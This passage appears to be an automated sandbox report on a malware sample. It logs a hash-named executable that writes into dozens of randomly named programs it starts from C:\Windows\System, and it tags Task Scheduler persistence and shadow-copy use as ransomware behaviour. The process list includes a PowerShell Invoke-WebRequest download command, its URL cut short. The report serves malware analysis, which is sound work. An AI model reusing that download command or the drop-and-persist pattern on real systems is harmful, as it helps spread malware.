PID 3096 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\axVNZQz.exe
PID 3096 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\axVNZQz.exe
PID 3096 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\aPjGTGe.exe
PID 3096 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\aPjGTGe.exe
PID 3096 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\EWdOxVy.exe
PID 3096 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\EWdOxVy.exe
PID 3096 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\brHqTLB.exe
PID 3096 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\brHqTLB.exe
PID 3096 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\IBMKRWO.exe
PID 3096 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\IBMKRWO.exe
PID 3096 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\sOalaow.exe
PID 3096 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\sOalaow.exe
PID 3096 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qndCowM.exe
PID 3096 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qndCowM.exe
PID 3096 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\PpisgNH.exe
PID 3096 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\PpisgNH.exe
PID 3096 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\urUyRME.exe
PID 3096 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\urUyRME.exe
PID 3096 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nwWVnrF.exe
PID 3096 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nwWVnrF.exe
PID 3096 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OwTpFMC.exe
PID 3096 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OwTpFMC.exe
PID 3096 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\SwCQmTw.exe
PID 3096 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\SwCQmTw.exe
PID 3096 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\bLpZMhH.exe
PID 3096 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\bLpZMhH.exe
PID 3096 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\pyyHgjv.exe
PID 3096 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\pyyHgjv.exe
PID 3096 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\Burqpzn.exe
PID 3096 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\Burqpzn.exe
PID 3096 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\XDZxNQE.exe
PID 3096 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\XDZxNQE.exe
PID 3096 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OuNGpZq.exe
PID 3096 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OuNGpZq.exe
PID 3096 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ILGXdDw.exe
PID 3096 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ILGXdDw.exe
PID 3096 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\TAOyIgC.exe
PID 3096 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\TAOyIgC.exe
PID 3096 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RdtjIlK.exe
PID 3096 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RdtjIlK.exe
PID 3096 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qUtHKyC.exe
PID 3096 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qUtHKyC.exe
PID 3096 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ygtUIca.exe
PID 3096 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ygtUIca.exe
PID 3096 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\JJjLlUH.exe
PID 3096 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\JJjLlUH.exe
PID 3096 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ScQKdch.exe
PID 3096 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ScQKdch.exe
PID 3096 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\trEJEmh.exe
PID 3096 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\trEJEmh.exe
PID 3096 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nKADzeH.exe
PID 3096 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nKADzeH.exe
PID 3096 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ybHZLWM.exe
PID 3096 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ybHZLWM.exe
PID 3096 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\AmtaodT.exe
PID 3096 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\AmtaodT.exe
PID 3096 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RLvenfC.exe
PID 3096 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RLvenfC.exe
PID 3096 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\whoZHnc.exe
PID 3096 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\whoZHnc.exe
PID 3096 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\zoOJLVN.exe
PID 3096 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\zoOJLVN.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe

"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\axVNZQz.exe

C:\Windows\System\axVNZQz.exe

C:\Windows\System\aPjGTGe.exe

C:\Windows\System\aPjGTGe.exe

C:\Windows\System\EWdOxVy.exe

C:\Windows\System\EWdOxVy.exe

C:\Windows\System\brHqTLB.exe

C:\Windows\System\brHqTLB.exe

C:\Windows\System\IBMKRWO.exe

C:\Windows\System\IBMKRWO.exe

C:\Windows\System\sOalaow.exe

C:\Windows\System\sOalaow.exe

C:\Windows\System\qndCowM.exe

C:\Windows\System\qndCowM.exe

C:\Windows\System\PpisgNH.exe

C:\Windows\System\PpisgNH.exe

C:\Windows\System\urUyRME.exe

C:\Windows\System\urUyRME.exe

C:\Windows\System\nwWVnrF.exe

C:\Windows\System\nwWVnrF.exe

C:\Windows\System\OwTpFMC.exe

C:\Windows\System\OwTpFMC.exe

C:\Windows\System\SwCQmTw.exe

C:\Windows\System\SwCQmTw.exe

C:\Windows\System\bLpZMhH.exe

C:\Windows\System\bLpZMhH.exe

C:\Windows\System\pyyHgjv.exe

C:\Windows\System\pyyHgjv.exe

C:\Windows\System\Burqpzn.exe

C:\Windows\System\Burqpzn.exe

C:\Windows\System\XDZxNQE.exe

C:\Windows\System\XDZxNQE.exe

C:\Windows\System\OuNGpZq.exe

C:\Windows\System\OuNGpZq.exe

C:\Windows\System\ILGXdDw.exe

C:\Windows\System\ILGXdDw.exe

C:\Windows\System\TAOyIgC.exe

C:\Windows\System\TAOyIgC.exe

C:\Windows\System\RdtjIlK.exe

C:\Windows\System\RdtjIlK.exe

C:\Windows\System\qUtHKyC.exe

C:\Windows\System\qUtHKyC.exe

C:\Windows\System\ygtUIca.exe

C:\Windows\System\ygtUIca.exe

C:\Windows\System\JJjLlUH.exe

C:\Windows\System\JJjLlUH.exe

C:\Windows\System\ScQKdch.exe

C:\Windows\System\ScQKdch.exe

C:\Windows\System\trEJEmh.exe

C:\Windows\System\trEJEmh.exe

C:\Windows\System\nKADzeH.exe

C:\Windows\System\nKADzeH.exe

C:\Windows\System\ybHZLWM.exe

C:\Windows\System\ybHZLWM.exe

C:\Windows\System\AmtaodT.exe

C:\Windows\System\AmtaodT.exe

C:\Windows\System\RLvenfC.exe

C:\Windows\System\RLvenfC.exe

C:\Windows\System\whoZHnc.exe

C:\Windows\System\whoZHnc.exe

C:\Windows\System\zoOJLVN.exe

C:\Windows\System\zoOJLVN.exe

C:\Windows\System\SyqIKiE.exe

C:\Windows\System\SyqIKiE.exe

C:\Windows\System\JwmkKWr.exe

C:\Windows\System\JwmkKWr.exe

C:\Windows\System\uomMsCL.exe

C:\Windows\System\uomMsCL.exe

C:\Windows\System\qfsgPNK.exe

C:\Windows\System\qfsgPNK.exe

C:\Windows\System\ZLHJgrb.exe

C:\Windows\System\ZLHJgrb.exe

C:\Windows\System\UpmNNNc.exe

C:\Windows\System\UpmNNNc.exe

C:\Windows\System\jSHSNNo.exe

C:\Windows\System\jSHSNNo.exe

C:\Windows\System\KjzBcML.exe

C:\Windows\System\KjzBcML.exe

C:\Windows\System\bxLGsnI.exe

C:\Windows\System\bxLGsnI.exe

C:\Windows\System\HghtKZy.exe

C:\Windows\System\HghtKZy.exe

C:\Windows\System\HlheYaz.exe

C:\Windows\System\HlheYaz.exe

C:\Windows\System\DtakIIV.exe

C:\Windows\System\DtakIIV.exe

C:\Windows\System\KSLmDSj.exe

C:\Windows\System\KSLmDSj.exe

C:\Windows\System\UVEbZRA.exe

C:\Windows\System\UVEbZRA.exe

C:\Windows\System\EYBfZjX.exe

C:\Windows\System\EYBfZjX.exe

C:\Windows\System\eRDrLDn.exe

C:\Windows\System\eRDrLDn.exe

C:\Windows\System\Eokyjbl.exe

C:\Windows\System\Eokyjbl.exe

C:\Windows\System\mgRmMZb.exe

C:\Windows\System\mgRmMZb.exe

C:\Windows\System\nOqNTFJ.exe

C:\Windows\System\nOqNTFJ.exe

C:\Windows\System\glLEVTL.exe

C:\Windows\System\glLEVTL.exe

C:\Windows\System\CplFYAK.exe

C:\Windows\System\CplFYAK.exe

C:\Windows\System\uZyViSu.exe

C:\Windows\System\uZyViSu.exe

C:\Windows\System\zbFLVEz.exe

C:\Windows\System\zbFLVEz.exe

C:\Windows\System\uoPtpCa.exe

C:\Windows\System\uoPtpCa.exe

C:\Windows\System\seXQAAj.exe

C:\Windows\System\seXQAAj.exe

C:\Windows\System\IlhRTZJ.exe

C:\Windows\System\IlhRTZJ.exe

C:\Windows\System\mnIGCht.exe

C:\Windows\System\mnIGCht.exe

C:\Windows\System\PFwZwRy.exe

C:\Windows\System\PFwZwRy.exe

C:\Windows\System\buusUZo.exe

C:\Windows\System\buusUZo.exe

C:\Windows\System\ErfkTej.exe

C:\Windows\System\ErfkTej.exe

C:\Windows\System\TRdfIRQ.exe

C:\Windows\System\TRdfIRQ.exe

C:\Windows\System\BKhgDAT.exe

C:\Windows\System\BKhgDAT.exe

C:\Windows\System\zgMDbxO.exe

C:\Windows\System\zgMDbxO.exe

C:\Windows\System\ommsLKu.exe

C:\Windows\System\ommsLKu.exe

C:\Windows\System\AuNLKLZ.exe

C:\Windows\System\AuNLKLZ.exe

C:\Windows\System\gtSReBv.exe

C:\Windows\System\gtSReBv.exe

C:\Windows\System\EyySyoh.exe

C:\Windows\System\EyySyoh.exe

C:\Windows\System\gUWvuLK.exe

C:\Windows\System\gUWvuLK.exe

C:\Windows\System\eajXYrT.exe

C:\Windows\System\eajXYrT.exe

C:\Windows\System\TFborHa.exe

C:\Windows\System\TFborHa.exe

C:\Windows\System\uMCyArA.exe

C:\Windows\System\uMCyArA.exe

C:\Windows\System\aQfBRpG.exe

C:\Windows\System\aQfBRpG.exe

C:\Windows\System\NXIkbaK.exe

C:\Windows\System\NXIkbaK.exe

C:\Windows\System\RSVFSKj.exe

C:\Windows\System\RSVFSKj.exe

C:\Windows\System\SbzIlWd.exe

C:\Windows\System\SbzIlWd.exe

C:\Windows\System\ecSyMaF.exe

C:\Windows\System\ecSyMaF.exe

C:\Windows\System\UtMtgIZ.exe

C:\Windows\System\UtMtgIZ.exe

C:\Windows\System\xhIyEbV.exe

C:\Windows\System\xhIyEbV.exe

C:\Windows\System\rSVfnmb.exe

C:\Windows\System\rSVfnmb.exe

C:\Windows\System\RbzuliS.exe

C:\Windows\System\RbzuliS.exe

C:\Windows\System\wFdxZtN.exe

C:\Windows\System\wFdxZtN.exe

C:\Windows\System\MMGUVvb.exe

C:\Windows\System\MMGUVvb.exe

C:\Windows\System\xyOygCh.exe

C:\Windows\System\xyOygCh.exe

C:\Windows\System\kcrLFqD.exe

C:\Windows\System\kcrLFqD.exe

C:\Windows\System\iMzlkeC.exe

C:\Windows\System\iMzlkeC.exe

C:\Windows\System\ArvkLiO.exe

C:\Windows\System\ArvkLiO.exe

C:\Windows\System\ytOVIbZ.exe

C:\Windows\System\ytOVIbZ.exe

C:\Windows\System\ThEEWXB.exe

C:\Windows\System\ThEEWXB.exe

C:\Windows\System\lAXkGjG.exe

C:\Windows\System\lAXkGjG.exe

C:\Windows\System\hkKXvOL.exe

C:\Windows\System\hkKXvOL.exe

C:\Windows\System\nVYsmke.exe

C:\Windows\System\nVYsmke.exe

C:\Windows\System\aaCvphv.exe

C:\Windows\System\aaCvphv.exe

C:\Windows\System\KUEyxzr.exe

C:\Windows\System\KUEyxzr.exe

C:\Windows\System\BGYPcvR.exe

C:\Windows\System\BGYPcvR.exe

C:\Windows\System\fzVdRMQ.exe

C:\Windows\System\fzVdRMQ.exe

C:\Windows\System\wDzdBke.exe

C:\Windows\System\wDzdBke.exe

C:\Windows\System\daAsNnI.exe

C:\Windows\System\daAsNnI.exe

C:\Windows\System\MJcKTxA.exe

C:\Windows\System\MJcKTxA.exe

C:\Windows\System\nsNzJer.exe

C:\Windows\System\nsNzJer.exe

C:\Windows\System\NslDvfo.exe

C:\Windows\System\NslDvfo.exe

C:\Windows\System\CwkutbX.exe

C:\Windows\System\CwkutbX.exe

C:\Windows\System\qMDyPbX.exe

C:\Windows\System\qMDyPbX.exe

C:\Windows\System\oPMPPdf.exe

C:\Windows\System\oPMPPdf.exe

C:\Windows\System\ewmwWXv.exe

C:\Windows\System\ewmwWXv.exe

C:\Windows\System\iQsGVrP.exe

C:\Windows\System\iQsGVrP.exe

C:\Windows\System\XzGxJjE.exe

C:\Windows\System\XzGxJjE.exe

C:\Windows\System\NxSZemC.exe

C:\Windows\System\NxSZemC.exe

C:\Windows\System\FIFvYuY.exe

C:\Windows\System\FIFvYuY.exe

C:\Windows\System\xiohMMz.exe

C:\Windows\System\xiohMMz.exe

C:\Windows\System\rePdsqK.exe

C:\Windows\System\rePdsqK.exe

C:\Windows\System\ovGIlTb.exe

C:\Windows\System\ovGIlTb.exe

C:\Windows\System\XXrtiVb.exe

C:\Windows\System\XXrtiVb.exe

C:\Windows\System\kzaKLOg.exe

C:\Windows\System\kzaKLOg.exe

C:\Windows\System\GbXZZOZ.exe

C:\Windows\System\GbXZZOZ.exe

C:\Windows\System\bwGemzi.exe

C:\Windows\System\bwGemzi.exe

C:\Windows\System\rqFyKMG.exe

C:\Windows\System\rqFyKMG.exe

C:\Windows\System\cFXBTYz.exe

C:\Windows\System\cFXBTYz.exe

C:\Windows\System\geAhvdI.exe

C:\Windows\System\geAhvdI.exe

C:\Windows\System\GCNxGTE.exe

C:\Windows\System\GCNxGTE.exe

C:\Windows\System\prezFSo.exe

C:\Windows\System\prezFSo.exe

C:\Windows\System\TCKITrY.exe

C:\Windows\System\TCKITrY.exe

C:\Windows\System\pyyhtvx.exe

C:\Windows\System\pyyhtvx.exe

C:\Windows\System\UtCPioV.exe

C:\Windows\System\UtCPioV.exe

C:\Windows\System\zgyMzjd.exe

C:\Windows\System\zgyMzjd.exe

C:\Windows\System\AgtMWSS.exe

C:\Windows\System\AgtMWSS.exe

C:\Windows\System\gOKMywz.exe

C:\Windows\System\gOKMywz.exe

C:\Windows\System\Aqmpvhx.exe

C:\Windows\System\Aqmpvhx.exe

C:\Windows\System\oXvXJKS.exe

C:\Windows\System\oXvXJKS.exe

C:\Windows\System\grUqtrL.exe

C:\Windows\System\grUqtrL.exe

C:\Windows\System\IyvbttH.exe

C:\Windows\System\IyvbttH.exe

C:\Windows\System\bRPpaBq.exe

C:\Windows\System\bRPpaBq.exe

C:\Windows\System\xoUxVLh.exe

C:\Windows\System\xoUxVLh.exe

C:\Windows\System\DVQOvMD.exe

C:\Windows\System\DVQOvMD.exe

C:\Windows\System\VJkVCDM.exe

C:\Windows\System\VJkVCDM.exe

C:\Windows\System\tcUVORN.exe

C:\Windows\System\tcUVORN.exe

C:\Windows\System\TZZBYYV.exe

C:\Windows\System\TZZBYYV.exe

C:\Windows\System\wfKxxkq.exe

C:\Windows\System\wfKxxkq.exe

C:\Windows\System\AZPQtLy.exe

C:\Windows\System\AZPQtLy.exe

C:\Windows\System\clPnfKK.exe

C:\Windows\System\clPnfKK.exe

C:\Windows\System\EtQVBCr.exe

C:\Windows\System\EtQVBCr.exe

C:\Windows\System\MqsPXrL.exe

C:\Windows\System\MqsPXrL.exe

C:\Windows\System\rnomGct.exe

C:\Windows\System\rnomGct.exe

C:\Windows\System\inpyqIp.exe

C:\Windows\System\inpyqIp.exe

C:\Windows\System\jopjFvT.exe

C:\Windows\System\jopjFvT.exe

C:\Windows\System\WkxZzRN.exe

C:\Windows\System\WkxZzRN.exe

C:\Windows\System\oRqXRKS.exe

C:\Windows\System\oRqXRKS.exe

C:\Windows\System\gPuOPYN.exe

C:\Windows\System\gPuOPYN.exe

C:\Windows\System\RGtVlOb.exe

C:\Windows\System\RGtVlOb.exe

C:\Windows\System\YekRVxL.exe

C:\Windows\System\YekRVxL.exe

C:\Windows\System\dwWYgpe.exe

C:\Windows\System\dwWYgpe.exe

C:\Windows\System\PgIlVer.exe

C:\Windows\System\PgIlVer.exe

C:\Windows\System\zirjchu.exe

C:\Windows\System\zirjchu.exe

C:\Windows\System\ubsHomx.exe

C:\Windows\System\ubsHomx.exe

C:\Windows\System\TnuzhVw.exe

C:\Windows\System\TnuzhVw.exe

C:\Windows\System\zkWzoTN.exe

C:\Windows\System\zkWzoTN.exe

C:\Windows\System\OKtDFbV.exe

C:\Windows\System\OKtDFbV.exe

C:\Windows\System\BOmbTxL.exe

C:\Windows\System\BOmbTxL.exe

C:\Windows\System\ocRVxfK.exe

C:\Windows\System\ocRVxfK.exe

C:\Windows\System\Mhusulm.exe

C:\Windows\System\Mhusulm.exe

C:\Windows\System\VZPyVKx.exe

C:\Windows\System\VZPyVKx.exe

C:\Windows\System\gyErbaz.exe

C:\Windows\System\gyErbaz.exe

C:\Windows\System\eAmeZAa.exe

C:\Windows\System\eAmeZAa.exe

C:\Windows\System\LkpsDyY.exe

C:\Windows\System\LkpsDyY.exe

C:\Windows\System\ZRCePpC.exe

C:\Windows\System\ZRCePpC.exe

C:\Windows\System\vEoitWT.exe

C:\Windows\System\vEoitWT.exe

C:\Windows\System\AYprNoP.exe

C:\Windows\System\AYprNoP.exe

C:\Windows\System\QhZiYPp.exe

C:\Windows\System\QhZiYPp.exe

C:\Windows\System\SgBkJOM.exe

C:\Windows\System\SgBkJOM.exe

C:\Windows\System\wwxdwmG.exe

C:\Windows\System\wwxdwmG.exe

C:\Windows\System\KLiVFub.exe

C:\Windows\System\KLiVFub.exe

C:\Windows\System\imfpwix.exe

C:\Windows\System\imfpwix.exe

C:\Windows\System\FYrqkGW.exe

C:\Windows\System\FYrqkGW.exe

C:\Windows\System\RHqjTjw.exe

C:\Windows\System\RHqjTjw.exe

C:\Windows\System\qKvjIWK.exe

C:\Windows\System\qKvjIWK.exe

C:\Windows\System\LRYoKFU.exe

C:\Windows\System\LRYoKFU.exe

C:\Windows\System\NZswjtY.exe

C:\Windows\System\NZswjtY.exe

C:\Windows\System\YFGVMSR.exe

C:\Windows\System\YFGVMSR.exe

C:\Windows\System\UWfjsoa.exe

C:\Windows\System\UWfjsoa.exe

C:\Windows\System\LulYPcq.exe

C:\Windows\System\LulYPcq.exe

C:\Windows\System\sMqtzdl.exe

C:\Windows\System\sMqtzdl.exe

C:\Windows\System\OZzoRJE.exe

C:\Windows\System\OZzoRJE.exe

C:\Windows\System\wzZVEVC.exe

C:\Windows\System\wzZVEVC.exe

C:\Windows\System\EXjBJFz.exe

C:\Windows\System\EXjBJFz.exe

C:\Windows\System\gPvOrkv.exe

C:\Windows\System\gPvOrkv.exe

C:\Windows\System\lhgIdhN.exe

C:\Windows\System\lhgIdhN.exe

C:\Windows\System\rZwKkfe.exe

C:\Windows\System\rZwKkfe.exe

C:\Windows\System\vjdVfUH.exe

C:\Windows\System\vjdVfUH.exe

C:\Windows\System\NfdviEF.exe

C:\Windows\System\NfdviEF.exe

C:\Windows\System\lqhVoso.exe

C:\Windows\System\lqhVoso.exe

C:\Windows\System\BVrEoGw.exe

C:\Windows\System\BVrEoGw.exe

C:\Windows\System\gcEpZry.exe

C:\Windows\System\gcEpZry.exe

C:\Windows\System\SPiOSPS.exe

C:\Windows\System\SPiOSPS.exe

C:\Windows\System\JNbnzag.exe

C:\Windows\System\JNbnzag.exe

C:\Windows\System\krpauzh.exe

C:\Windows\System\krpauzh.exe

C:\Windows\System\ILXFEcv.exe

C:\Windows\System\ILXFEcv.exe

C:\Windows\System\UCuKxxr.exe

C:\Windows\System\UCuKxxr.exe

C:\Windows\System\UHbkhej.exe

C:\Windows\System\UHbkhej.exe

C:\Windows\System\OlcuNJy.exe

C:\Windows\System\OlcuNJy.exe

C:\Windows\System\TeJfaqE.exe

C:\Windows\System\TeJfaqE.exe

C:\Windows\System\msNlPXw.exe

